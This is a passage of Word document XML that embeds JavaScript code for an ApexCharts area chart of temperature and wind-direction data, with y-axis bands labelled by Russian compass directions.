    <w:p w14:paraId="13B90CD1" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>contentType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: "application/json; charset=utf-8",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2D67EC" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>dataType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: "json",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F892D7" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            success: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>OnSuccessResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08260E3D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            error: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>OnError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36FCDC41" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9A75E5" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>OnSuccessResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>temperatureChart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A98238" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartLabels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>temperatureChart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F588BF" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>temperatureChart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148BB82B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartWindDirData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>temperatureChart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>2];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F25069D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartMatter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7B8954" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartWindDirData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>= null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5050429E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartMatter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32187ED7" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    chart: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C6D6F8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        height: 280,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1731D245" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        type: "area"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5C6360" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5D5091" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>dataLabels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E8735C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        enabled: false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9E8276" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFFD465" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    annotations: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A83CCE8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>yaxis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D58AC30" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD260FC" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                y: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADFA28D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                y2: 90,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306BD091"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332D203F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>fillColor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: '#FEB019',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653AD4FF" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                label: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0A18C0"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2764369F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                    text: '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Восток</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A90466E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEACD8B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DC1056" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                y: 91,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6B679E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                y2: 180,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7572F0F6"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55930208" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>fillColor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: 'Khaki',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C1BFB5" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                label: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE42B37"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5E5ABA1D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                    text: '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Юг</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A2E245" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CF54F2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FAA6A0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED71261" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                y: 181,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE8ED4D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                y2: 270,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E4898D"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077DB341" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>fillColor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>YellowGreen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C526D99" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                label: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01436E23"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12E4E964" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                    text: '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Запад</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DA6F67" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F0B219" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CED4C0F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668BD9A0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                y: 360,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E28CAD6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                y2: 271,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFA22F3"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201B8864" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>fillColor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>DarkTurquoise</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4C1C13" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                label: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DDE424"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0885E763" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                    text: '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Север</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140A7E2F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719793E8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F122C62" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573D843E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0713CA" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    series: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208F2159" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFF1BA4" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            name: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>seriesName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED420EB" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            data: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1AFFB602" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF62E03" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
